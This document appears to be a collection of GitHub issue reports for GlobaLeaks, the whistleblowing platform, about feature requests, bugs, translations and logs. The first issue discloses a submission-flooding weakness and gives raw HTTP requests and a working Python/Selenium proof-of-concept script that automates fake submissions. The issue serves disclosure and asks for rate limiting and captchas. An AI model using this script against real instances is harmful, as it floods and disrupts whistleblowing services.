GlobaLeaks is free, open source software enabling anyone to easily set up and maintain a secure whistleblowing platform.

It's currently possible to bring a brute forcing attack to globaleaks users.

The features to be properly implemented we should follow the guideline of the document Application Security Design and Details: https://docs.google.com/a/apps.globaleaks.org/document/d/1SMSiAry7x5XY9nY8GAejJD75NWg7bp7M1PwXSiwy62U/edit#heading=h.5ynpiv27n1j6

Current behavior Due to the implementation of the token generation, an attacker can flood submissions. Visiting https://xxx.try.globaleaks.org/#/submission creates two requests, second having the answer in the PUT request and marking the response "solved":true"

first POST request:

---Request---
POST /token HTTP/1.1
Host: xxx.try.globaleaks.org

{"type":"submission"}

---Response---
HTTP/1.1 201 Created

{"id":"uwBm1S5SS4yQ8x155ZT44RuRsLVQnrHf46diQsDyVg","creation_date":"2020-02-25T08:15:02.791977Z","type":"submission","question":"czXEZjkR2TBQzpZfm3Jr","solved":false}

second PUT request:

---Request---
PUT /token/uwBm1S5SS4yQ8x155ZT44RuRsLVQnrHf46diQsDyVg HTTP/1.1
Host: xxx.try.globaleaks.org

{"id":"uwBm1S5SS4yQ8x155ZT44RuRsLVQnrHf46diQsDyVg","creation_date":"2020-02-25T08:15:02.791977Z","type":"submission","question":"czXEZjkR2TBQzpZfm3Jr","solved":false,"answer":208}

---Response---
HTTP/1.1 202 Accepted

{"id":"uwBm1S5SS4yQ8x155ZT44RuRsLVQnrHf46diQsDyVg","creation_date":"2020-02-25T08:15:02.791977Z","type":"submission","question":"czXEZjkR2TBQzpZfm3Jr","solved":true}

Since calling the https://xxx.try.globaleaks.org/#/submission page creates a valid token, this can be used to pass to the submisson page due to the only validity check being the parameter 'token_id' which we got earlier.

PUT /submission/uwBm1S5SS4yQ8x155ZT44RuRsLVQnrHf46diQsDyVg HTTP/1.1
Host: xxx.try.globaleaks.org

{"context_id":"ae042b6d-e711-4d2f-bfb2-353a0d085193","receivers":["c112c15a-b289-4c71-8ba7-922bd32c1154"],"identity_provided":false,"answers":{"be986d48-d12a-4b6a-b92c-3f86bc12e53b":[{"required_status":false,"value":"1"}],"ae7317b8-19bf-4e00-926b-56cff86a7203":[{"required_status":false,"value":"1"}],"b5b119a9-2298-4c75-9e1a-0f6cc7172770":[{"required_status":false}]},"answer":0,"total_score":0,"removed_files":[],"token_id":"uwBm1S5SS4yQ8x155ZT44RuRsLVQnrHf46diQsDyVg"}

Below is a screenshot of how an attacker can use it for his leverage.

Expected behavior

• Implementing a validation session key to the header or a captcha before the submission can resolve this issue.
• Implement rate limitation

Steps to reproduce the problem or feature illustration Below is a simple POC script to automate the process

import time, json, copy, requests
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.chrome.options import Options
from selenium import webdriver

token = '1'
caps = copy.deepcopy(DesiredCapabilities.CHROME)
caps['goog:loggingPrefs'] = {'performance': 'ALL'}
driver_options = Options()
driver_options.add_argument("--headless")
driver = webdriver.Chrome(desired_capabilities=caps, options=driver_options)
driver.get('https://xxx.try.globaleaks.org')
time.sleep(1)
browser_log = driver.get_log('performance') 
for entry in browser_log:
	x = json.loads(entry['message'])['message']
	if ('url' in str(x)) and ("/token/" in str(x)) and ('Network.responseReceived' in str(x)):
		token = (x['params']['response']['url'])
		token = token.partition("token/")[2]

if len(token) > 1:
	url = "https://xxx.try.globaleaks.org/submission/"+str(token)
	headers = {"Connection": "close", "Accept": "application/json, text/plain, */*", "Sec-Fetch-Dest": "empty", "GL-Language": "en", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36", "Content-Type": "application/json;charset=UTF-8", "Origin": "https://xxx.try.globaleaks.org", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9"}
	json_req={"answer": 0, "answers": {"15ab2573-a2f9-4827-b870-63c4bb27a550": [{"value": "a8a93dc0-889e-4982-a265-9192b391f9d4"}], "1fa659bc-a3b6-4f74-bce4-96f3382d4a52": [{"value": "17df2ad5-717b-4472-8f07-1a5b0c4b9a09"}], "4043f238-6a66-4e94-9c89-bb6e47b3b4e3": [], "4cc7bb72-9665-4dca-a96c-1c2df20f2361": [{"db5fd5da-650a-489a-899c-39e754c0dd23": [], "e35c8e83-1709-49dc-9957-28d5faf91c04": []}], "62abe7c5-6f84-4d2a-a5c7-d8cd757a20a8": [{"2cb6dbdd-2a4d-4f19-908f-06f2c6e94d99": [], "431cdece-aa86-4bd5-9e31-188a3b852bed": [], "6cba81d9-c824-4c19-8c75-73df604db734": []}], "959e136f-2c68-475d-a5c6-30738119adbd": [], "96e08398-9606-4eb3-bb0b-8cbfa95b6d00": [{"value": "1"}]}, "context_id": "0ffc7359-d67b-49a3-9c0b-2acdb28526d8", "identity_provided": False, "receivers": ["8ab57516-35b6-42a7-bfe5-9105a0d85187", "25ff141e-3dd6-4317-b0d7-cb2140fa85f0", "cbcb1390-6db5-44cd-a7f4-ae6da41edb15"], "token_id": str(token), "total_score": 0}
	rr = requests.put(url, headers=headers, json=json_req, timeout=15)
	print (rr.text)

What is the motivation or use case for changing the behavior? To stop an attacker from creating huge amount of submissions.

GlobaLeaks version: Works on the latest version

The rtlcss by @MohammadYounes seems to work really well in handling automagically RTL conversion of CSS written for LTR.

That library is already used by wordpress and is under evaluation by the bootstrap: https://github.com/twbs/bootstrap/issues/19555

It would be interesting to adopt it in the project instead of caring of all manually

It has been requested by Transparency-TI to improve the notification templates in order add the possibility to add a classification label.

The idea is that analyzing a tip the receiver(s) could assign a label to the tip in order to identify further submission in relation to an opened case.

Want to back this issue? Post a bounty on it! We accept bounties via Bountysource.

The Field Refactor branch is getting ready to be merged into the devel branch.

I am going to open this pull request to keep track of it's work in progress. I expect that by the end of today this will be ready to be reviewed.

Relevant tickets are: https://github.com/globaleaks/GlobaLeaks/issues/1006 https://github.com/globaleaks/GlobaLeaks/issues/912

I am not sure how much other stuff in here: https://github.com/globaleaks/GlobaLeaks/labels/OTF-D4.2:%20Introduce%20configuration%20profiles%20(ready-made%20submission%20fields) should be fixed by this branch.

@evilaliv3 @mmaker

This ticket is to define the list and minor version of supported browser for GlobaLeaks support.

The supported browser's client access should enforced trough the Client UI, by displaying a big warning that the specific browser is still not supported, before allowing to do anything.

Following the implementation of this ticket, we should update technical requirement document at https://github.com/globaleaks/GlobaLeaks/wiki/Technical-requirements with the details of supported client browser .

Want to back this issue? Post a bounty on it! We accept bounties via Bountysource.

Hi, I cannot load PGP public key in user prefereces. When I copy and paste or select file with public key the form field are red rounded for validation error and I can't save preferences.

Is it a bug of the new update?

Thank you very much for your help. GlobaLeaks version: 3.0.10

Browser: any

Latest fields incorrent validation prevent successful submissions.

Way to reproduce: - Create a default context - Create a default receiver and associate it to the context - Make a simple submission without completing any field.

@vecna can you please take care of debugging this?

The following is the related stack trace:

2013-08-25 12:44:57+0200 HTTPRequest(protocol='http', host='127.0.0.1:8082', method='PUT', uri='/submission/b5fbe155-d288-4eca-8590-505a41671a3c', version='HTTP/1.1', remote_ip='127.0.0.1', body='{"wb_fields":{"Short title":"","Full description":"","Files description":""},"pertinence":"0","receivers":["ed33294d-b0ae-40e6-afd1-5b75cc718459"],"expiration_date":"2013-09-09T10:44:47.447275","access_limit":50,"receipt":"","context_gus":"6cf25587-7ded-474c-a65a-744587c90d88","creation_date":"2013-08-25T11:44:47.447308","escalation_threshold":"0","download_limit":3,"submission_gus":"b5fbe155-d288-4eca-8590-505a41671a3c","mark":"submission","id":"b5fbe155-d288-4eca-8590-505a41671a3c","files":[],"finalize":true}', headers={'Origin': 'http://127.0.0.1:8082', 'Content-Length': '516', 'Accept-Language': 'en-US,en;q=0.8', 'Accept-Encoding': 'gzip,deflate,sdch', 'Gl-Language': 'en', 'Host': '127.0.0.1:8082', 'Accept': 'application/json, text/plain, /', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/28.0.1500.71 Chrome/28.0.1500.71 Safari/537.36', 'Connection': 'keep-alive', 'X-Requested-With': 'XMLHttpRequest', 'Referer': 'http://127.0.0.1:8082/', 'X-Xsrf-Token': '3c58fced173e4308af25d163d74139dd', 'Cookie': 'XSRF-TOKEN=3c58fced173e4308af25d163d74139dd; language=en', 'Content-Type': 'application/json;charset=UTF-8'}) 2013-08-25 12:44:57+0200 {'Origin': 'http://127.0.0.1:8082', 'Content-Length': '516', 'Accept-Language': 'en-US,en;q=0.8', 'Accept-Encoding': 'gzip,deflate,sdch', 'Gl-Language': 'en', 'Connection': 'keep-alive', 'Accept': 'application/json, text/plain, /', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/28.0.1500.71 Chrome/28.0.1500.71 Safari/537.36', 'Host': '127.0.0.1:8082', 'X-Requested-With': 'XMLHttpRequest', 'Cookie': 'XSRF-TOKEN=3c58fced173e4308af25d163d74139dd; language=en', 'X-Xsrf-Token': '3c58fced173e4308af25d163d74139dd', 'Referer': 'http://127.0.0.1:8082/', 'Content-Type': 'application/json;charset=UTF-8'} 2013-08-25 12:44:58+0200 '[!] Submission has a required field (Short title) missing' 2013-08-25 12:44:58+0200 [ ] 412 PUT /submission/b5fbe155-d288-4eca-8590-505a41671a3c (127.0.0.1): GLException 2013-08-25 12:44:58+0200 [http] 412 PUT /submission/b5fbe155-d288-4eca-8590-505a41671a3c (127.0.0.1) 164.42ms 2013-08-25 12:45:00+0200 HTTPRequest(protocol='http', host='127.0.0.1:8082', method='PUT', uri='/submission/b5fbe155-d288-4eca-8590-505a41671a3c', version='HTTP/1.1', remote_ip='127.0.0.1', body='{"wb_fields":{"Short title":"","Full description":"","Files description":""},"pertinence":"0","receivers":["ed33294d-b0ae-40e6-afd1-5b75cc718459","ed33294d-b0ae-40e6-afd1-5b75cc718459"],"expiration_date":"2013-09-09T10:44:47.447275","access_limit":50,"receipt":"","context_gus":"6cf25587-7ded-474c-a65a-744587c90d88","creation_date":"2013-08-25T11:44:47.447308","escalation_threshold":"0","download_limit":3,"submission_gus":"b5fbe155-d288-4eca-8590-505a41671a3c","mark":"submission","id":"b5fbe155-d288-4eca-8590-505a41671a3c","files":[],"finalize":true}', headers={'Origin': 'http://127.0.0.1:8082', 'Content-Length': '555', 'Accept-Language': 'en-US,en;q=0.8', 'Accept-Encoding': 'gzip,deflate,sdch', 'Gl-Language': 'en', 'Host': '127.0.0.1:8082', 'Accept': 'application/json, text/plain, /', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/28.0.1500.71 Chrome/28.0.1500.71 Safari/537.36', 'Connection': 'keep-alive', 'X-Requested-With': 'XMLHttpRequest', 'Referer': 'http://127.0.0.1:8082/', 'X-Xsrf-Token': '3c58fced173e4308af25d163d74139dd', 'Cookie': 'XSRF-TOKEN=3c58fced173e4308af25d163d74139dd; language=en', 'Content-Type': 'application/json;charset=UTF-8'}) 2013-08-25 12:45:00+0200 {'Origin': 'http://127.0.0.1:8082', 'Content-Length': '555', 'Accept-Language': 'en-US,en;q=0.8', 'Accept-Encoding': 'gzip,deflate,sdch', 'Gl-Language': 'en', 'Connection': 'keep-alive', 'Accept': 'application/json, text/plain, /', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/28.0.1500.71 Chrome/28.0.1500.71 Safari/537.36', 'Host': '127.0.0.1:8082', 'X-Requested-With': 'XMLHttpRequest', 'Cookie': 'XSRF-TOKEN=3c58fced173e4308af25d163d74139dd; language=en', 'X-Xsrf-Token': '3c58fced173e4308af25d163d74139dd', 'Referer': 'http://127.0.0.1:8082/', 'Content-Type': 'application/json;charset=UTF-8'} 2013-08-25 12:45:00+0200 File "/data/devel/GLBackend/globaleaks/settings.py", line 562, in _wrap 2013-08-25 12:45:00+0200 result = function(self.store, _args, *_kwargs) 2013-08-25 12:45:00+0200 File "/data/devel/GLBackend/globaleaks/handlers/submission.py", line 58, in create_whistleblower_tip 2013-08-25 12:45:00+0200 assert submission is not None and submission.has_key('id') 2013-08-25 12:45:00+0200 "[!] Uncaught exception <type 'exceptions.AssertionError'> <traceback object at 0x7f2170067050>" 2013-08-25 12:45:00+0200 [ ] 2013-08-25 12:45:00+0200 '[!] AssertionError Assertion failed.' 2013-08-25 12:45:00+0200 '[!] Traceback (most recent call last):\n\n File "/usr/local/lib/python2.7/dist-packages/twisted/internet/defer.py", line 1068, in _inlineCallbacks\n result = result.throwExceptionIntoGenerator(g)\n\n File "/usr/local/lib/python2.7/dist-packages/twisted/python/failure.py", line 389, in throwExceptionIntoGenerator\n return g.throw(self.type, self.value, self.tb)\n\n File "/data/devel/GLBackend/globaleaks/handlers/submission.py", line 410, in put\n receipt = yield create_whistleblower_tip(status)\n\n File "/usr/local/lib/python2.7/dist-packages/twisted/python/threadpool.py", line 191, in _worker\n result = context.call(ctx, function, _args, *_kwargs)\n\n File "/usr/local/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext\n return self.currentContext().callWithContext(ctx, func, _args, *_kw)\n\n File "/usr/local/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext\n return func(args,*kw)\n\n File "/data/devel/GLBackend/globaleaks/settings.py", line 575, in _wrap\n raise excep\n\nAssertionError\n'

It has been requested by a prospect adopter (amnesty international) to have a procedure to provide notification of upcoming expiration of Tip to receivers part of it.

The notification of tip expiration should be configurable from the receiver, both in term of enabling/disabling the feature, and in terms of timing remaining until expiration when they need to get notified.

That's specifically because some of the researcher are "in office" while some other are often travelling, so they may need very different configuration related to notification of upcoming tip expiry time.

This ticket is to introduce automated notification of new version availability to admin of GlobaLeaks, so that admins can be notified when a new version of the software is released.

GlobaLeaks should poll a URL somewhere managed by us, that contain the new version information and message that the software shall fetch, parse and send by email to the admin of the platform.

That way it will be possible to notify all the admin upon the releases, concentrating the public / unmanaged upgraded within a specific timeframe window.

When a whistleblower uploads a file, it is written to the hard drive in plain text. When the whistleblower submits the Tip, the file is encrypted with the receiver's public key then the originally-uploaded temporary file is removed. If the whistleblower uploads a file, but never follows through with submitting the tip, the file they uploaded will remain on disk indefinitely.

Is your feature request related to a problem? Please describe. When we have two questionnaires in the same report, the interface doesn't use the "Name" field and instead uses "Questionnaire 1", "Questionnaire 2" as section titles.

Describe the solution you'd like We would like to use the Questionnaire "Name" as the title, not a generic "Questionnaire ##"

Describe alternatives you've considered The way we currently do it, is by modifying (using javascript) the interface presented to the user to show the names of the questionnaires ( in this case, hardcoded, not retrieved from the database)

Current interface

Questionnaire 1 Question Answer Question Answer

Questionnaire 2

Question Answer Question Answer

What we would like

Name of the questionnaire or other field for this ( in our current case - Information request) Question Answer Question Answer

Name of the questionnaire or other field for this ( in our current case - Summary of your report) Question Answer Question Answer

This ticket is to evaluate the possibility of removing notifications about reports expiration and evaluate alternatives to communicate this information more efficiently.

The consideration at the base of this proposal is that an active system, running for many years, will have a large set of reports expiring every day and thus triggering notifications about expiration.

On such a situation, users would be continuously notified via email with the risk of being annoyed and start ignoring email notifications.

Hello

The word "seção" in the next sentence It is written in Brazilian Portuguese. In Portuguese from Portugal it is "secção"

msgstr "Recomendamos que aceda à seção “Preferências” para copiar a sua “Chave de recuperação de conta” e armazená-la em segurança. Esta chave será necessária para recuperar seu acesso à plataforma e aos seus dados caso se esqueça da sua palavra-passe."

This translation can be found on line 1380 of the pt_PT.pt file

This feature is discussed in detail regarding problem, reason and most feasible solution in the thread attached below

https://github.com/globaleaks/GlobaLeaks/issues/2866

When a user tries to login with real passowrd it gives the message:

The code is either invalid or expired.

If a user tries to login with a random password it gives the message

Authentication failed

Good morning. For a few days now, the system that deals with timed operations has been sending out alerts almost daily.

twisted.web._newclient.ResponseNeverReceived A L{ResponseFailed} that knows no response bytes at all have been received.

Traceback (most recent call last):

File "/usr/lib/python3/dist-packages/globaleaks/jobs/job.py", line 49, in run yield self.operation()

twisted.web._newclient.ResponseNeverReceived: [<twisted.python.failure.Failure twisted.internet.error.ConnectionLost: Connection to the other side was lost in a non-clean fashion: Connection lost.>]

what is "Connection to the other side"? Is it a bug? What can I do about it?